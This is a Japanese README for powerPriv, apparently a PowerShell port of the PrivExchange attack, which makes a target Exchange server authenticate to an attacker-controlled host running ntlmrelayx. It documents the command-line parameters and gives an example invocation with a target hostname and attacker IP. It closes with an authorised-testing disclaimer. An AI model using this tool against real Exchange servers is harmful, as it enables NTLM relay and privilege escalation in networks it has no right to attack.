
PrivExchangeのPowerShell実装(作成者: @_dirkjan)(オリジナルコードはこちら: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Pythonベースのアプリケーションを実行できない環境、ユーザー資格情報があるがディスクにファイルを書き込みたくない環境で有用です。ターゲットのExchangeサーバーシステムアカウントに、あなたが選択したシステムへの認証を試行させます。
-targetHostターゲットExchangeサーバーのホスト名またはIPアドレス。DNS設定によっては、ホスト名を使用する場合にFQDNが必要になる場合があります。(必須)
-attackerHostあなたが管理し、理想的にはntlmrelayxを実行しているシステムのホスト名またはIPアドレス。Exchangeサーバーにこのシステムへの認証を試行させます。DNS設定によっては、ホスト名を使用する場合にFQDNが必要になる場合があります。(必須)
-exchangePortExchangeサーバーへの接続に使用するポート。デフォルトは443。
-attackerPortExchangeサーバーが攻撃者に接続を戻す際に使用するポート。デフォルトは80。
-attackerPageExchangeサーバーに接続させる攻撃システム上のページ。スラッシュは不要。デフォルトはpowerPriv。
-noSSL最初にExchangeサーバーに接続する際にHTTPSを使用したくない場合はtrueに設定。デフォルトはfalse(HTTPSを使用)。
-VersionターゲットとするExchangeサーバーのバージョン。デフォルトは2013。
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
作成者: @g0ldenGunSec - @_dirkjanが作成したツールに基づく
このツールは、あなたが所有するかテストする許可を得たネットワークでのみ使用してください。